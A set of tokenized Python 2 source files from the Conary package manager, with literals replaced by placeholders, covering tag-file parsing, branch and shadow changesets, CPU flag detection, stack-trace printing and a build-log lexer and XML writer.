'<STR_LIT>' , source . addPatch ) <EOL> self . _addSourceAction ( '<STR_LIT>' , source . addSource ) <EOL> exec defaultrecipes . DerivedPackageRecipe </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from conary . build import filter <EOL> from conary . lib . cfg import CfgEnum , CfgList , CfgString , ConfigFile , ParseError <EOL> from conary . lib . cfg import directive <EOL> EXCLUDE , INCLUDE = range ( <NUM_LIT:2> ) <EOL> class CfgImplementsItem ( CfgEnum ) : <EOL> validValueDict = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , '<STR_LIT>' ) } <EOL> def __init__ ( self ) : <EOL> validValues = [ ] <EOL> for fileType , actionList in self . validValueDict . iteritems ( ) : <EOL> validValues . extend ( '<STR_LIT:U+0020>' . join ( ( fileType , x ) ) for x in actionList ) <EOL> self . validValues = validValues <EOL> CfgEnum . __init__ ( self ) <EOL> def checkEntry ( self , val ) : <EOL> if val . find ( "<STR_LIT:U+0020>" ) < <NUM_LIT:0> : <EOL> raise ParseError , '<STR_LIT>' % val <EOL> CfgEnum . checkEntry ( self , val ) <EOL> CfgImplements = CfgList ( CfgImplementsItem ) <EOL> class CfgDataSource ( CfgEnum ) : <EOL> validValues = [ '<STR_LIT:args>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class TagFile ( ConfigFile ) : <EOL> file = CfgString <EOL> name = CfgString <EOL> description = CfgString <EOL> datasource = ( CfgDataSource , '<STR_LIT:args>' ) <EOL> implements = CfgImplements <EOL> def __init__ ( self , filename , macros = { } , warn = False ) : <EOL> ConfigFile . __init__ ( self ) <EOL> self . tag = os . path . basename ( filename ) <EOL> self . tagFile = filename <EOL> self . macros = macros <EOL> self . filterlist = [ ] <EOL> self . read ( filename , exception = True ) <EOL> if '<STR_LIT>' in self . __dict__ : <EOL> for item in self . __dict__ [ '<STR_LIT>' ] : <EOL> if item . find ( "<STR_LIT:U+0020>" ) < <NUM_LIT:0> : <EOL> raise ParseError , '<STR_LIT>' % item <EOL> key , val = item . split ( "<STR_LIT:U+0020>" ) <EOL> if key == '<STR_LIT:description>' : <EOL> if warn : <EOL> raise ParseError , '<STR_LIT>' % ( key , filename ) <EOL> continue <EOL> @ directive <EOL> def include ( self , val ) : <EOL> if not self . macros : <EOL> return <EOL> self . filterlist . append ( ( INCLUDE , filter . Filter ( val , self . macros ) ) ) <EOL> @ directive <EOL> def exclude ( self , val ) : <EOL> if not self . macros : <EOL> return <EOL> self . filterlist . append ( ( EXCLUDE , filter . Filter ( val , self . macros ) ) ) <EOL> def match ( self , filename ) : <EOL> for keytype , filter in self . filterlist : <EOL> if filter . match ( filename ) : <EOL> if keytype == EXCLUDE : <EOL> return False <EOL> else : <EOL> return True <EOL> return False <EOL> def loadTagDict ( dirPath ) : <EOL> d = { } <EOL> try : <EOL> files = os . listdir ( dirPath ) <EOL> except OSError : <EOL> return { } <EOL> for path in files : <EOL> if path . startswith ( '<STR_LIT:.>' ) : <EOL> continue <EOL> c = TagFile ( os . path . join ( dirPath , path ) ) <EOL> d [ c . tag ] = c <EOL> return d </s>
<s> from conary . deps import deps <EOL> from conary . repository import changeset <EOL> from conary . repository import errors as repoerrors <EOL> from conary import errors <EOL> from conary import versions <EOL> from conary import trove <EOL> class BranchError ( errors . ClientError ) : <EOL> pass <EOL> class ClientBranch ( object ) : <EOL> BRANCH_SOURCE = <NUM_LIT:1> << <NUM_LIT:0> <EOL> BRANCH_BINARY = <NUM_LIT:1> << <NUM_LIT:1> <EOL> BRANCH_ALL = BRANCH_SOURCE | BRANCH_BINARY <EOL> __developer_api__ = True <EOL> def createBranchChangeSet ( self , newLabel , <EOL> troveList = [ ] , branchType = BRANCH_ALL , <EOL> sigKeyId = None ) : <EOL> return self . _createBranchOrShadow ( newLabel , troveList , shadow = False , <EOL> branchType = branchType , <EOL> sigKeyId = sigKeyId ) <EOL> def createShadowChangeSet ( self , newLabel , troveList = [ ] , <EOL> branchType = BRANCH_ALL , <EOL> sigKeyId = None , <EOL> allowEmptyShadow = False ) : <EOL> return self . _createBranchOrShadow ( newLabel , troveList , shadow = True , <EOL> branchType = branchType , <EOL> sigKeyId = sigKeyId , <EOL> allowEmptyShadow = allowEmptyShadow ) <EOL> def _checkForLaterShadows ( self , newLabel , troves ) : <EOL> query = { } <EOL> for trv in troves : <EOL> versionDict = query . setdefault ( trv . getName ( ) , { } ) <EOL> b = trv . getVersion ( ) . branch ( ) . createShadow ( newLabel ) <EOL> versionDict [ b ] = None <EOL> results = self . repos . getTroveLeavesByBranch ( query ) <EOL> if not results : <EOL> return [ ] <EOL> oldTroves = [ ] <EOL> for trv in troves : <EOL> versionDict = results . get ( trv . getName ( ) , { } ) <EOL> b = trv . getVersion ( ) . branch ( ) . createShadow ( newLabel ) <EOL> versionList = [ x for x in versionDict if x . branch ( ) == b and not x . isModifiedShadow ( ) ] <EOL> if not versionList : <EOL> continue <EOL> latestVersion = max ( versionList ) <EOL> oldVersion = latestVersion . parentVersion ( ) <EOL> oldTroves . extend ( ( trv . getName ( ) , oldVersion , x ) for x in versionDict [ latestVersion ] ) <EOL> shadowedTroves = self . repos . getTroves ( oldTroves , withFiles = False ) <EOL> shadowed = { } <EOL> for shadowedTrove in shadowedTroves : <EOL> ( n , v , f ) = shadowedTrove . getNameVersionFlavor ( ) <EOL> shadowed [ n , v . branch ( ) , f ] = v <EOL> laterShadows = [ ] <EOL> for trv in troves : <EOL> ( n , v , f ) = trv . getNameVersionFlavor ( ) <EOL> shadowedVer = shadowed . get ( ( n , v . branch ( ) , f ) , None ) <EOL> if not shadowedVer : <EOL> continue <EOL> if v < shadowedVer : <EOL> laterShadows . append ( ( n , v , f , shadowedVer ) ) <EOL> return laterShadows <EOL> def _createBranchOrShadow ( self , newLabel , troveList , shadow , <EOL> branchType = BRANCH_ALL , sigKeyId = None , <EOL> allowEmptyShadow = False ) : <EOL> cs = changeset . ChangeSet ( ) <EOL> seen = set ( troveList ) <EOL> sourceTroveList = set ( ) <EOL> troveList = set ( troveList ) <EOL> dupList = [ ] <EOL> needsCommit = False <EOL> newLabel = versions . Label ( newLabel ) <EOL> while troveList : <EOL> troves = self . repos . getTroves ( troveList ) <EOL> troveList = set ( ) <EOL> branchedTroves = { } <EOL> if sourceTroveList : <EOL> for st in sourceTroveList : <EOL> try : <EOL> sourceTrove = self . repos . getTrove ( * st ) <EOL> except repoerrors . TroveMissing : <EOL> if allowEmptyShadow : <EOL> st [ <NUM_LIT:1> ] . resetTimeStamps ( ) <EOL> sourceTrove = trove . Trove ( * st ) <EOL> else : <EOL> raise <EOL> troves . append ( sourceTrove ) <EOL> sourceTroveList = set ( ) <EOL> if shadow : <EOL> laterShadows = self . _checkForLaterShadows ( newLabel , troves ) <EOL> if laterShadows : <EOL> msg = [ ] <EOL> for n , v , f , shadowedVer in laterShadows : <EOL> msg . append ( '''<STR_LIT>''' % ( n , shadowedVer , f , n , v , f ) ) <EOL> raise BranchError ( '<STR_LIT>' . join ( msg ) ) <EOL> for trv in troves : <EOL> if trv . isRedirect ( ) : <EOL> raise errors . ShadowRedirect ( * trv . getNameVersionFlavor ( ) ) <EOL> newTroves = [ x for x in <EOL> trv . iterTroveList ( strongRefs = True , <EOL> weakRefs = True ) if x not in seen ] <EOL> troveList . update ( newTroves ) <EOL> seen . update ( newTroves ) <EOL> troveName = trv . getName ( ) <EOL> if troveName . endswith ( '<STR_LIT>' ) : <EOL> if not ( branchType & self . BRANCH_SOURCE ) : <EOL> continue <EOL> elif branchType & self . BRANCH_SOURCE : <EOL> if not trv . getSourceName ( ) : <EOL> from conary . lib import log <EOL> log . warning ( '<STR_LIT>' % troveName ) <EOL> sourceName = troveName <EOL> else : <EOL> sourceName = trv . getSourceName ( ) <EOL> key = ( sourceName , <EOL> trv . getVersion ( ) . getSourceVersion ( False ) , <EOL> deps . Flavor ( ) ) <EOL> if key not in seen : <EOL> seen . add ( key ) <EOL> sourceTroveList . add ( key ) <EOL> if not ( branchType & self . BRANCH_BINARY ) : <EOL> continue <EOL> if shadow : <EOL> branchedVersion = trv . getVersion ( ) . createShadow ( newLabel ) <EOL> else : <EOL> branchedVersion = trv . getVersion ( ) . createBranch ( newLabel , <EOL> withVerRel = <NUM_LIT:1> ) <EOL> branchedTrove = trv . copy ( ) <EOL> branchedTrove . changeVersion ( branchedVersion ) <EOL> branchedTrove . troveInfo . sigs . reset ( ) <EOL> branchedTrove . copyMetadata ( trv ) <EOL> for ( ( name , version , flavor ) , byDefault , isStrong ) in trv . iterTroveListInfo ( ) : <EOL> if shadow : <EOL> branchedVersion = version . createShadow ( newLabel ) <EOL> else : <EOL> branchedVersion = version . createBranch ( newLabel , <EOL> withVerRel = <NUM_LIT:1> ) <EOL> branchedTrove . delTrove ( name , version , flavor , <EOL> missingOkay = False , <EOL> weakRef = not isStrong ) <EOL> branchedTrove . addTrove ( name , branchedVersion , flavor , <EOL> byDefault = byDefault , <EOL> weakRef = not isStrong ) <EOL> key = ( trv . getName ( ) , branchedTrove . getVersion ( ) , <EOL> trv . getFlavor ( ) ) <EOL> if sigKeyId is not None : <EOL> branchedTrove . addDigitalSignature ( sigKeyId ) <EOL> else : <EOL> branchedTrove . computeDigests ( ) <EOL> if branchedTrove . getVersion ( ) . trailingLabel ( ) . getHost ( ) == trv . getVersion ( ) . trailingLabel ( ) . getHost ( ) : <EOL> branchedTroves [ key ] = branchedTrove . diff ( trv , <EOL> absolute = False ) [ <NUM_LIT:0> ] <EOL> else : <EOL> branchedTroves [ key ] = branchedTrove . diff ( None , <EOL> absolute = True ) [ <NUM_LIT:0> ] <EOL> hasTroves = self . repos . hasTroves ( branchedTroves ) <EOL> for ( name , version , flavor ) , troveCs in branchedTroves . iteritems ( ) : <EOL> if hasTroves [ name , version , flavor ] : <EOL> dupList . append ( ( name , version . branch ( ) ) ) <EOL> else : <EOL> cs . newTrove ( troveCs ) <EOL> cs . addPrimaryTrove ( name , version , flavor ) <EOL> needsCommit = True <EOL> if not needsCommit : <EOL> cs = None <EOL> return dupList , cs </s>
<s> from conary . deps import deps <EOL> import os <EOL> def x86flags ( archTag , baseArch , extraFlags , ofInterest ) : <EOL> try : <EOL> lines = open ( "<STR_LIT>" ) . read ( ) . split ( "<STR_LIT:\n>" ) <EOL> except IOError : <EOL> lines = [ ] <EOL> rc = [ ( x , deps . FLAG_SENSE_PREFERRED ) for x in extraFlags ] <EOL> for line in lines : <EOL> if not line . startswith ( "<STR_LIT>" ) : continue <EOL> fields = line . split ( ) <EOL> if fields [ <NUM_LIT:0> ] != "<STR_LIT>" : continue <EOL> for flag in fields [ <NUM_LIT:2> : ] : <EOL> if ofInterest . has_key ( flag ) : <EOL> rc . append ( ( flag , deps . FLAG_SENSE_PREFERRED ) ) <EOL> return deps . Dependency ( archTag , rc ) <EOL> return deps . Dependency ( archTag ) <EOL> def flags_ix86 ( baseArch ) : <EOL> baseFlagMap = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> i = baseFlagMap . index ( baseArch ) <EOL> ofInterest = { } . fromkeys ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return [ [ x86flags ( '<STR_LIT>' , baseArch , baseFlagMap [ i : ] , ofInterest ) ] ] <EOL> def flags_i686 ( ) : <EOL> return flags_ix86 ( baseArch = '<STR_LIT>' ) <EOL> def flags_i586 ( ) : <EOL> return flags_ix86 ( baseArch = '<STR_LIT>' ) <EOL> def flags_mips64 ( ) : <EOL> return [ [ deps . Dependency ( '<STR_LIT>' , [ ( '<STR_LIT>' , deps . FLAG_SENSE_REQUIRED ) ] ) ] ] <EOL> def flags_x86_64 ( ) : <EOL> baseFlagMap = [ ] <EOL> ofInterest = { } . fromkeys ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> x86_64 = x86flags ( '<STR_LIT>' , baseArch , baseFlagMap , ofInterest ) <EOL> multiarch = flags_i686 ( ) <EOL> multiarch [ <NUM_LIT:0> ] . append ( x86_64 ) <EOL> return multiarch <EOL> def current ( ) : <EOL> return currentArch <EOL> def any ( ) : <EOL> return "<STR_LIT>" <EOL> def canInstall ( other ) : <EOL> return other == "<STR_LIT>" or other == currentArch <EOL> def initializeArch ( ) : <EOL> global currentArch <EOL> localNamespace = globals ( ) <EOL> if localNamespace . has_key ( "<STR_LIT>" + baseArch ) : <EOL> currentArch = localNamespace [ "<STR_LIT>" + baseArch ] ( ) <EOL> del localNamespace <EOL> baseArch = os . uname ( ) [ <NUM_LIT:4> ] <EOL> currentArch = [ [ deps . Dependency ( baseArch ) ] ] <EOL> initializeArch ( ) <EOL> class FlavorPreferences : <EOL> @ staticmethod <EOL> def _getCurrentArchIS ( arch ) : <EOL> return '<STR_LIT:U+0020>' . join ( sorted ( dep . name for dep in arch [ <NUM_LIT:0> ] ) ) <EOL> flavorPreferences = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } <EOL> @ staticmethod <EOL> def getStringFlavorPreferences ( arch ) : <EOL> key = FlavorPreferences . _getCurrentArchIS ( arch ) <EOL> return FlavorPreferences . flavorPreferences . get ( key , [ ] ) <EOL> @ staticmethod <EOL> def getFlavorPreferences ( arch ) : <EOL> return [ deps . parseFlavor ( x ) <EOL> for x in FlavorPreferences . getStringFlavorPreferences ( arch ) ] <EOL> def getFlavorPreferences ( arch = currentArch ) : <EOL> return FlavorPreferences . getFlavorPreferences ( arch ) <EOL> class IncompatibleInstructionSets ( Exception ) : <EOL> def __init__ ( self , is1 , is2 ) : <EOL> Exception . __init__ ( self ) <EOL> self . is1 = is1 <EOL> self . is2 = is2 <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . is1 , self . is2 ) <EOL> def getFlavorPreferencesFromFlavor ( depSet ) : <EOL> arch = getMajorArch ( depSet . iterDepsByClass ( deps . InstructionSetDependency ) ) <EOL> if arch is None : <EOL> return None <EOL> return getFlavorPreferences ( [ [ arch ] ] ) <EOL> def getMajorArch ( depList ) : <EOL> """<STR_LIT>""" <EOL> majorArch = None <EOL> depList = list ( depList ) <EOL> if not depList : <EOL> return None <EOL> if len ( depList ) == <NUM_LIT:1> : <EOL> return depList [ <NUM_LIT:0> ] <EOL> for dep in depList : <EOL> prefs = set ( getFlavorPreferences ( [ [ dep ] ] ) ) <EOL> if not prefs : <EOL> continue <EOL> majorArch = dep <EOL> prefArches = set ( ) <EOL> for depSet in prefs : <EOL> for dep in depSet . iterDepsByClass ( deps . InstructionSetDependency ) : <EOL> prefArches . add ( dep . name ) <EOL> break <EOL> if not majorArch : <EOL> raise IncompatibleInstructionSets ( depList [ <NUM_LIT:0> ] . name , depList [ <NUM_LIT:1> ] ) <EOL> for dep in depList : <EOL> if dep . name != majorArch . name and getFlavorPreferences ( [ [ dep ] ] ) : <EOL> raise IncompatibleInstructionSets ( majorArch . name , dep ) <EOL> elif dep . name not in prefArches : <EOL> raise IncompatibleInstructionSets ( majorArch . name , dep ) <EOL> return majorArch </s>
<s> """<STR_LIT>""" <EOL> import inspect <EOL> import smtplib <EOL> import sys <EOL> import string <EOL> import tempfile <EOL> import traceback <EOL> import xmlrpclib <EOL> from repr import Repr <EOL> _repr = Repr ( ) <EOL> _repr . maxstring = <NUM_LIT> <EOL> _saferepr = _repr . repr <EOL> def printTraceBack ( tb = None , output = sys . stderr , exc_type = None , exc_msg = None ) : <EOL> if isinstance ( output , str ) : <EOL> output = open ( output , '<STR_LIT:w>' ) <EOL> exc_info = sys . exc_info ( ) <EOL> if tb is None : <EOL> tb = exc_info [ <NUM_LIT:2> ] <EOL> if exc_type is None : <EOL> exc_type = exc_info [ <NUM_LIT:0> ] <EOL> if exc_msg is None : <EOL> exc_msg = exc_info [ <NUM_LIT:1> ] <EOL> if exc_type is not None : <EOL> output . write ( '<STR_LIT>' ) <EOL> exc_info = '<STR_LIT:\n>' . join ( traceback . format_exception_only ( exc_type , exc_msg ) ) <EOL> output . write ( exc_info ) <EOL> output . write ( '<STR_LIT>' ) <EOL> lines = traceback . format_exception ( exc_type , exc_msg , tb ) <EOL> output . write ( string . joinfields ( lines , "<STR_LIT>" ) ) <EOL> while tb : <EOL> _printFrame ( tb . tb_frame , output = output ) <EOL> tb = tb . tb_next <EOL> def printFrame ( frame = <NUM_LIT:0> , output = sys . stderr ) : <EOL> if isinstance ( output , str ) : <EOL> output = open ( output , '<STR_LIT:w>' ) <EOL> if isinstance ( frame , int ) : <EOL> frame = sys . _getframe ( frame + <NUM_LIT:1> ) <EOL> _printFrame ( frame , output ) <EOL> def printStack ( frame = <NUM_LIT:0> , output = sys . stderr ) : <EOL> if isinstance ( output , str ) : <EOL> output = open ( output , '<STR_LIT:w>' ) <EOL> if isinstance ( frame , int ) : <EOL> frame = sys . _getframe ( frame + <NUM_LIT:1> ) <EOL> while ( frame ) : <EOL> output . write ( "<STR_LIT>" ) <EOL> _printFrame ( frame , output ) <EOL> frame = frame . f_back <EOL> def mailStack ( frame , recips , sender , subject , extracontent = None ) : <EOL> file = tempfile . TemporaryFile ( ) <EOL> file . write ( '<STR_LIT>' + subject + '<STR_LIT>' ) <EOL> if extracontent : <EOL> file . write ( extracontent ) <EOL> printStack ( frame , file ) <EOL> server = smtplib . SMTP ( '<STR_LIT:localhost>' ) <EOL> file . seek ( <NUM_LIT:0> ) <EOL> server . sendmail ( sender , <EOL> recips , <EOL> file . read ( ) ) <EOL> server . close ( ) <EOL> file . close ( ) <EOL> def _printFrame ( f , output = sys . stderr ) : <EOL> c = f . f_code <EOL> argcount = c . co_argcount <EOL> varnames = c . co_varnames <EOL> args = varnames [ : argcount ] <EOL> locals = f . f_locals <EOL> globals = f . f_globals <EOL> output . write ( "<STR_LIT>" % ( c . co_filename , f . f_lineno , globals [ '<STR_LIT>' ] , c . co_name , '<STR_LIT:U+002CU+0020>' . join ( args ) ) ) <EOL> localkeys = [ l for l in f . f_locals . keys ( ) if not inspect . ismodule ( locals [ l ] ) ] <EOL> if argcount > <NUM_LIT:0> : <EOL> output . write ( "<STR_LIT>" ) <EOL> for var in varnames [ : argcount ] : <EOL> if var in locals : <EOL> val = locals [ var ] <EOL> val = _getStringValue ( val ) <EOL> localkeys . remove ( var ) <EOL> else : <EOL> val = '<STR_LIT>' <EOL> output . write ( "<STR_LIT>" % ( var , _saferepr ( val ) ) ) <EOL> for hidden in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if hidden in localkeys : <EOL> localkeys . remove ( hidden ) <EOL> localkeys . sort ( ) <EOL> if localkeys : <EOL> output . write ( "<STR_LIT>" ) <EOL> for key in localkeys : <EOL> if key in locals : <EOL> val = locals [ key ] <EOL> val = _getStringValue ( val ) <EOL> else : <EOL> val = '<STR_LIT>' <EOL> output . write ( "<STR_LIT>" % ( key , _saferepr ( val ) ) ) <EOL> def _getStringValue ( val ) : <EOL> try : <EOL> if isinstance ( val , xmlrpclib . ServerProxy ) : <EOL> rval = "<STR_LIT>" <EOL> elif hasattr ( val , '<STR_LIT>' ) : <EOL> rval = val . asString ( ) <EOL> elif inspect . isclass ( val ) : <EOL> rval = '<STR_LIT>' % ( val . __module__ , val . __name__ ) <EOL> elif not hasattr ( val , '<STR_LIT>' ) : <EOL> if hasattr ( val , '<STR_LIT>' ) : <EOL> rval = '<STR_LIT>' % val . __class__ <EOL> else : <EOL> rval = '<STR_LIT>' <EOL> else : <EOL> rval = val <EOL> return rval <EOL> except Exception , e : <EOL> try : <EOL> return '<STR_LIT>' % ( repr ( val ) , e ) <EOL> except Exception , e : <EOL> return '<STR_LIT>' % ( e ) </s>
<s> import base64 <EOL> import bz2 <EOL> import errno <EOL> import gzip <EOL> import os <EOL> import re <EOL> import select <EOL> import signal <EOL> import struct <EOL> import sys <EOL> import threading <EOL> import time <EOL> from xml . sax import saxutils <EOL> from conary . errors import ConaryError <EOL> try : <EOL> import fcntl <EOL> import termios <EOL> import tty <EOL> except ImportError : <EOL> fcntl = termios = tty = None <EOL> BUFFER = <NUM_LIT> * <NUM_LIT> <EOL> MARKER , FREETEXT , NEWLINE , CARRIAGE_RETURN , COMMAND , CLOSE = range ( <NUM_LIT:6> ) <EOL> LINEBREAKS = ( '<STR_LIT:\r>' , '<STR_LIT:\n>' ) <EOL> def callable ( func ) : <EOL> func . _callable = True <EOL> return func <EOL> def makeRecord ( d ) : <EOL> res = "<STR_LIT>" <EOL> for key , val in sorted ( d . iteritems ( ) ) : <EOL> res += "<STR_LIT>" % ( key , val , key ) <EOL> res += "<STR_LIT>" <EOL> return res <EOL> def getTime ( ) : <EOL> """<STR_LIT>""" <EOL> curTime = time . time ( ) <EOL> msecs = <NUM_LIT:1000> * ( curTime - long ( curTime ) ) <EOL> fmtStr = "<STR_LIT>" <EOL> return time . strftime ( fmtStr , time . gmtime ( curTime ) ) % msecs <EOL> def openPath ( path ) : <EOL> class BZ2File ( bz2 . BZ2File ) : <EOL> def flush ( self ) : <EOL> pass <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> return BZ2File ( path , '<STR_LIT:w>' ) <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> return gzip . GzipFile ( path , '<STR_LIT:w>' ) <EOL> return open ( path , '<STR_LIT:w>' ) <EOL> class Lexer ( object ) : <EOL> def __init__ ( self , marker , callbacks = None ) : <EOL> self . marker = marker <EOL> self . callbacks = callbacks or [ ] <EOL> self . stream = '<STR_LIT>' <EOL> self . mark = False <EOL> self . markMatch = '<STR_LIT>' <EOL> self . state = FREETEXT <EOL> def registerCallback ( self , callback ) : <EOL> self . callbacks . append ( callback ) <EOL> def freetext ( self , text ) : <EOL> self . emit ( ( FREETEXT , text ) ) <EOL> def newline ( self ) : <EOL> self . emit ( ( NEWLINE , None ) ) <EOL> def carriageReturn ( self ) : <EOL> self . emit ( ( CARRIAGE_RETURN , None ) ) <EOL> def command ( self , text ) : <EOL> self . emit ( ( COMMAND , text . split ( None , <NUM_LIT:1> ) ) ) <EOL> def close ( self ) : <EOL> if self . state == NEWLINE : <EOL> self . newline ( ) <EOL> self . emit ( ( CLOSE , None ) ) <EOL> def scan ( self , sequence ) : <EOL> """<STR_LIT>""" <EOL> for char in sequence : <EOL> if self . state == FREETEXT : <EOL> if char in LINEBREAKS : <EOL> if self . stream : <EOL> self . freetext ( self . stream ) <EOL> self . stream = '<STR_LIT>' <EOL> if char == '<STR_LIT:\n>' : <EOL> self . state = NEWLINE <EOL> else : <EOL> self . carriageReturn ( ) <EOL> else : <EOL> self . stream += char <EOL> elif self . state == NEWLINE : <EOL> if char in LINEBREAKS : <EOL> self . newline ( ) <EOL> self . stream = '<STR_LIT>' <EOL> if char == '<STR_LIT:\r>' : <EOL> self . carriageReturn ( ) <EOL> self . state = FREETEXT <EOL> else : <EOL> if self . marker . startswith ( char ) : <EOL> self . stream = char <EOL> self . state = MARKER <EOL> else : <EOL> self . newline ( ) <EOL> self . stream = char <EOL> self . state = FREETEXT <EOL> elif self . state == MARKER : <EOL> if char in LINEBREAKS : <EOL> self . newline ( ) <EOL> if self . stream : <EOL> self . freetext ( self . stream ) <EOL> self . stream = '<STR_LIT>' <EOL> if char == '<STR_LIT:\r>' : <EOL> self . carriageReturn ( ) <EOL> self . state = FREETEXT <EOL> else : <EOL> self . state = NEWLINE <EOL> else : <EOL> candidate = self . stream + char <EOL> self . stream += char <EOL> if self . stream == self . marker : <EOL> self . stream = '<STR_LIT>' <EOL> self . state = COMMAND <EOL> else : <EOL> if not self . marker . startswith ( candidate ) : <EOL> self . newline ( ) <EOL> self . state = FREETEXT <EOL> elif self . state == COMMAND : <EOL> if char == '<STR_LIT:\n>' : <EOL> self . command ( self . stream . lstrip ( ) ) <EOL> self . stream = '<STR_LIT>' <EOL> self . state = FREETEXT <EOL> else : <EOL> self . stream += char <EOL> if self . state == FREETEXT : <EOL> if self . stream : <EOL> self . freetext ( self . stream ) <EOL> self . stream = '<STR_LIT>' <EOL> def write ( self , text ) : <EOL> return self . scan ( text ) <EOL> def flush ( self ) : <EOL> self . scan ( '<STR_LIT>' ) <EOL> def emit ( self , token ) : <EOL> for callback in self . callbacks : <EOL> callback ( token ) <EOL> class LogWriter ( object ) : <EOL> def handleToken ( self , token ) : <EOL> mode , param = token <EOL> if mode == FREETEXT : <EOL> self . freetext ( param ) <EOL> elif mode == NEWLINE : <EOL> self . newline ( ) <EOL> elif mode == CARRIAGE_RETURN : <EOL> self . carriageReturn ( ) <EOL> elif mode == COMMAND : <EOL> self . command ( * param ) <EOL> elif mode == CLOSE : <EOL> self . close ( ) <EOL> def freetext ( self , text ) : <EOL> pass <EOL> def write ( self , text ) : <EOL> return self . freetext ( text ) <EOL> def flush ( self ) : <EOL> pass <EOL> def newline ( self ) : <EOL> pass <EOL> def carriageReturn ( self ) : <EOL> pass <EOL> def start ( self ) : <EOL> pass <EOL> @ callable <EOL> def reportMissingBuildRequires ( self , data ) : <EOL> self . freetext ( "<STR_LIT>" <EOL> % "<STR_LIT>" . join ( data . split ( '<STR_LIT:U+0020>' ) ) ) <EOL> self . newline ( ) <EOL> @ callable <EOL> def reportExcessBuildRequires ( self , data ) : <EOL> self . freetext ( "<STR_LIT>" <EOL> % "<STR_LIT>" . join ( data . split ( '<STR_LIT:U+0020>' ) ) ) <EOL> self . newline ( ) <EOL> @ callable <EOL> def reportExcessSuperclassBuildRequires ( self , data ) : <EOL> self . freetext ( "<STR_LIT>" <EOL> % "<STR_LIT>" . join ( data . split ( '<STR_LIT:U+0020>' ) ) ) <EOL> self . newline ( ) <EOL> def command ( self , cmd , * args ) : <EOL> func = getattr ( self . __class__ , cmd , False ) <EOL> if func and func . __dict__ . get ( '<STR_LIT>' , False ) : <EOL> try : <EOL> return func ( self , * args ) <EOL> except TypeError : <EOL> self . freetext ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( cmd , repr ( args ) ) ) <EOL> except Exception , e : <EOL> self . freetext ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( <EOL> str ( e . __class__ ) , str ( e ) , cmd , repr ( args ) ) ) <EOL> def close ( self ) : <EOL> pass <EOL> class XmlLogWriter ( LogWriter ) : <EOL> def __init__ ( self , path ) : <EOL> self . data = threading . local ( ) <EOL> self . messageId = <NUM_LIT:0> <EOL> self . path = path <EOL> self . logging = False <EOL> self . text = '<STR_LIT>' <EOL> self . stream = None <EOL> LogWriter . __init__ ( self ) <EOL> def flush ( self ) : <EOL> self . stream . flush ( ) <EOL> def start ( self ) : <EOL> self . stream = openPath ( self . path ) <EOL> print >> self . stream , '<STR_LIT>' <EOL> print >> self . stream , "<STR_LIT>" <EOL> self . log ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . stream . flush ( ) <EOL> self . logging = True <EOL> def _getDescriptorStack ( self ) : <EOL> if not hasattr ( self . data , '<STR_LIT>' ) : <EOL> self . data . descriptorStack = [ ] <EOL> return self . data . descriptorStack <EOL> def _getRecordData ( self ) : <EOL> if not hasattr ( self . data , '<STR_LIT>' ) : <EOL> self . data . recordData = { } <EOL> return self . data . recordData <EOL> def close ( self ) : <EOL> if not self . logging : <EOL> return <EOL> del self . _getDescriptorStack ( ) [ : ] <EOL> self . _getRecordData ( ) . clear ( ) <EOL> self . log ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> print >> self . stream , "<STR_LIT>" <EOL> self . stream . flush ( ) <EOL> self . stream . close ( ) <EOL> def freetext ( self , text ) : <EOL> self . text += text <EOL> def newline ( self ) : <EOL> if self . text : <EOL> self . log ( self . text ) <EOL> self . text = '<STR_LIT>' <EOL> carriageReturn = newline <EOL> def _getDescriptor ( self ) : <EOL> descriptorStack = self . _getDescriptorStack ( ) <EOL> return '<STR_LIT:.>' . join ( descriptorStack ) <EOL> def log ( self , message , levelname = '<STR_LIT>' ) : <EOL> message = saxutils . escape ( message ) <EOL> message = message . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> macros = { } <EOL> recordData = self . _getRecordData ( ) <EOL> macros . update ( recordData ) <EOL> macros [ '<STR_LIT:time>' ] = getTime ( ) <EOL> macros [ '<STR_LIT:message>' ] = message <EOL> macros [ '<STR_LIT>' ] = levelname <EOL> macros [ '<STR_LIT>' ] = os . getpid ( ) <EOL> threadName = threading . currentThread ( ) . getName ( ) <EOL> if threadName != '<STR_LIT>' : <EOL> macros [ '<STR_LIT>' ] = threadName <EOL> macros [ '<STR_LIT>' ] = self . messageId <EOL> self . messageId += <NUM_LIT:1> <EOL> descriptor = self . _getDescriptor ( ) <EOL> if descriptor : <EOL> macros [ '<STR_LIT>' ] = descriptor <EOL> print >> self . stream , makeRecord ( macros ) <EOL> @ callable <EOL> def pushDescriptor ( self , descriptor ) : <EOL> descriptorStack = self . _getDescriptorStack ( ) <EOL> 